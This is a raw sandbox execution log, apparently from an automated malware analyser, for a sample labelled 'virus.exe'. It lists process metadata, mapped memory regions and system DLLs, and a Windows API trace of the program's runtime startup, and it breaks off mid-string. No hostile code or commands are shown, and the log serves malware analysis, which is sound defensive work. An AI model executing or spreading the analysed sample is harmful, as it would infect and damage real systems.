# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 13.01.2022 19:04:41.175 Process: id = "1" image_name = "eb023c854d3c8a24589e9294fd5d346e.virus.exe" filename = "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" page_root = "0x479ce000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 117 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 118 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x403410 region_type = mapped_file name = "eb023c854d3c8a24589e9294fd5d346e.virus.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe") Region: id = 119 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 120 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 121 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 122 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 123 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 124 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 267 start_va = 0x1d0000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 268 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 269 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 270 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 271 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 275 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 277 start_va = 0x250000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 278 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 280 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 281 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 282 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 283 start_va = 0x380000 end_va = 0x3e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x450000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 285 start_va = 0x20000 end_va = 0x28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 286 start_va = 0x620000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 287 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 288 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 289 start_va = 0x30000 end_va = 0x38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 290 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 291 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 292 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 293 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 294 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 295 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 296 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 297 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 298 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 299 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 300 start_va = 0x450000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 301 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 302 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 303 start_va = 0x620000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 304 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 305 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 306 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 307 start_va = 0x7b0000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 308 start_va = 0x940000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 309 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 310 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 311 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 312 start_va = 0x450000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 313 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 314 start_va = 0x450000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 315 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 316 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 317 start_va = 0x1c0000 end_va = 0x1c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 318 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 1 os_tid = 0xe9c [0045.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x83336740, dwHighDateTime=0x1d808b0)) [0045.536] GetCurrentProcessId () returned 0xe98 [0045.536] GetCurrentThreadId () returned 0xe9c [0045.536] GetTickCount () returned 0x16fa6e0 [0045.536] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2422904190563) returned 1 [0045.571] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.572] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x610000 [0045.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0045.573] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.573] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.573] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.574] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.574] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.574] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.574] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.574] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.576] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0045.576] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x214) returned 0x6107d0 [0045.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.577] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0045.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0045.577] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0045.577] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0045.577] GetCurrentThreadId () returned 0xe9c [0045.577] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0045.577] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x6109f0 [0045.578] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.578] SetHandleCount (uNumber=0x20) returned 0x20 [0045.578] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" " [0045.578] GetEnvironmentStringsW () returned 0x28ef98* [0045.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0045.578] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x587) returned 0x6111f8 [0045.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x6111f8, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0045.578] FreeEnvironmentStringsW (penv=0x28ef98) returned 1 [0045.578] GetLastError () returned 0x0 [0045.579] SetLastError (dwErrCode=0x0) [0045.579] GetLastError () returned 0x0 [0045.579] SetLastError (dwErrCode=0x0) [0045.579] GetLastError () returned 0x0 [0045.579] SetLastError (dwErrCode=0x0) [0045.579] GetACP () returned 0x4e4 [0045.579] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x220) returned 0x611788 [0045.579] GetLastError () returned 0x0 [0045.579] SetLastError (dwErrCode=0x0) [0045.579] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.579] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0045.579] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] SetLastError (dwErrCode=0x0) [0045.579] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0045.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.580] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0045.580] GetLastError () returned 0x0 [0045.580] SetLastError (dwErrCode=0x0) [0045.580] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0045.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā") returned 256 [0045.580] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.580] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.581] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 